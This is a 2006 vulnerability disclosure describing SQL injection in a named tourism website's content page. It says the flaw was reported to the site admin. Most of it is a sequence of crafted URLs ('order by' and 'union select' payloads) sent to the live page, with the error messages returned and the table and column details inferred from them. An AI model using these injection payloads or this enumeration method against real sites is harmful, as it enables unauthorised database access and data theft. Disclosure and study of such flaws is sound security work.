SQL Injection in incredibleindia.org
Vulnerable Page: http://www.incredibleindia.org/newsite/cms_Page.asp
Found By: Susam Pal
Found On: 29th March, 2006, Wednesday
Vulnerability Type: SQL Injection
Action Taken: Reported to admin@xxxxxxxxxxxxxxxxxxx
Description:
www.incredibleindia.org is a tourism website. The site is prone to SQL
injection which can be exploited to reveal the table
names, some column names as well as their data types. Exploiting the
vulnerability requires some reverse engineering. The ASP
ODBC error messages can be displayed by passing bad values for the parameters
in the URL.
Example URL 1: http://www.incredibleindia.org/newsite/cms_Page.asp?PageID=828'
Error Found: Unclosed quotation mark before the character string ' and
mncpage.mnccategoryid = mnccategory.mnccategoryid'.
Conclusion: Direct SQL Injection is possible. There are 2 tables, 'mncpage' and
'mnccategory'. Both of them have a column
called 'mnccategoryid'.
Example URL 2: http://www.incredibleindia.org/newsite/cms_Page.asp?PageID=828
order by 1--
Example URL 3: http://www.incredibleindia.org/newsite/cms_Page.asp?PageID=828
order by 2--
Example URL 4: http://www.incredibleindia.org/newsite/cms_Page.asp?PageID=828
order by 3--
Error Found: None
Example URL 5: http://www.incredibleindia.org/newsite/cms_Page.asp?PageID=828
order by 4--
Error Found: The ORDER BY position number 4 is out of range of the number of
items in the select list.
Conclusion: The table being used by the query selects 3 columns and one of them
is an integer.
Example URL 6: http://www.incredibleindia.org/newsite/cms_Page.asp?PageID=828
union select 'varchar1', 'varchar2', 'varchar3'
from mncpage--
Error Found: Syntax error converting the varchar value 'varchar1' to a column
of data type int.
Conclusion: The 1st column in the select query is an integer.
Error URL 7: http://www.incredibleindia.org/newsite/cms_Page.asp?PageID=828
union select mnccategoryid, 'varchar2',
'varchar3' from mncpage--
Error Found: None
Conclusion: The column 'mnccategory' is of integer type.